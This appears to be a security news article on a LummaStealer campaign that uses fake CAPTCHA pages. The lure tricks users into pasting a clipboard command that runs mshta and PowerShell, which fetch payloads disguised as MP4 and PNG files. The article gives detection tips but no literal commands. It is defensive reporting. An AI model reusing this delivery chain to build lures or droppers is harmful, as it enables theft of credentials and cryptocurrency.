Cybercriminals have refined their attack methodologies with a sophisticated campaign leveraging LummaStealer malware and deceptive CAPTCHA prompts to harvest sensitive data.

This social engineering approach combines psychological manipulation with lightweight payload delivery, enabling threat actors to bypass traditional security controls while scaling their operations.

The malware, which targets browser credentials, cryptocurrency wallets, and system information, represents an evolving threat in the cybersecurity landscape.

LummaStealer, also known as LummaC2, has been active since 2022 when it first appeared on underground forums under the name “7.62mm Stealer.”

Operating as a Malware-as-a-Service platform, LummaStealer enables cybercriminals of varying technical capabilities to deploy sophisticated attacks against unsuspecting victims.

Early campaigns typically delivered payloads through malicious HTML attachments disguised as Microsoft Word files, but recent variants have adopted more deceptive tactics.

Binary Defense researchers have identified a concerning trend in which LummaStealer operators employ a technique called FakeCAPTCHA to trick users into self-executing malicious code.

According to analysis from the ARC Labs team, this new delivery method doesn’t rely on exploits but instead abuses native Windows utilities to evade endpoint detection.

The approach demonstrates how threat actors continue to evolve their techniques to maximize success rates while minimizing detection.

The impact of LummaStealer extends beyond individual users to potentially affect organizations of all sizes.

Once infected, victim systems have their credentials, cryptocurrency wallets, and other sensitive information exfiltrated to command-and-control servers.

This data can be used for financial fraud, account takeovers, and as stepping stones for more extensive network compromises.

Infection Chain Technical Analysis

The FakeCAPTCHA technique presents victims with what appears to be a standard human verification challenge, typically displaying a “Verification Failed – Network Error” or “Human Verification” message.

Rather than clicking on images or typing text, users are instructed to perform a series of actions: press Windows+R to open the Run dialog, paste a command that has been automatically copied to their clipboard, and press Enter.

This user-initiated action triggers an mshta execution that downloads and executes a PowerShell script disguised as an MP4 file.

Though appearing to be a video file, this script launches another PowerShell command that retrieves a file named web.png, which, despite its extension, contains the actual LummaC2 payload.

This deceptive chain utilizes the Net.WebClient PowerShell function to pull remote payloads while hiding execution through parameters like “-hidden” and “bypass” to create concealed PowerShell windows.

The infection flow shows that the users are manipulated into executing a multi-stage attack chain that ultimately delivers the LummaC2 payload through seemingly innocent file types.

Security professionals should implement monitoring for PowerShell activity involving Net.WebClient, especially when launched from unexpected parent processes like mshta.exe or when using hidden execution flags.

Additionally, vigilance regarding external network connections initiated by mshta.exe and correlations between clipboard usage and Run prompt activity can help identify potential compromise attempts.

Are you from the SOC and DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.